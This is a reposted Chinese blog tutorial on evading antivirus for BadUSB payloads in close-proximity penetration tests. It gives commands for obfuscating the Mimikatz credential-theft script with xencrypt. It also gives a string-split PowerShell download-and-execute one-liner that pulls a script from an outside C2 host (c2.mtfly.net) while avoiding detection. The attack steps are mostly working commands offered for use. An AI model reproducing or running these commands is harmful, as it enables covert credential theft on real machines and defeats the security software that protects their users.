關於近源滲透測試的免殺


近源滲透測試badusb執行代碼的免殺

在進行近源滲透測試的時候,我們發現國內殺軟對powershell的管制非常的嚴格,只要有后台隱藏執行的powershell都會觸發可疑行為警報,但是這不代表不能繞過。
powershell.png

生成powershell payload

如圖生成payload,我們使用powershell的payload,就不用勾選64位了
TIM圖片20200415192803.png

powershell混淆

接下來做混淆,否則ps腳本下載下來也是被殺軟秒殺的,可以使用InvokeObfuscation或者xencrypt。
我這里使用的是xencrypt

Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 68

可以選擇免殺68次
https://github.com/the-xentropy/xencrypt

badusb運行腳本拆分免殺

由於免殺后的腳本會很大,所以我們可以用powershell IEX(New-Object Net.WebClient).DownloadString("http://x.x.x.x/2.ps1")從服務器下載ps腳本運行,但是會被殺軟殺,所以可以用拆分免殺。

powershell.exe ”$a1='IEX ((new-objectnet.webclient).downl';$a2='oadstring(''http://c2.mtfly.net/2.ps1''))';$a3="$a1,$a2";IEX(-join $a3)""


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM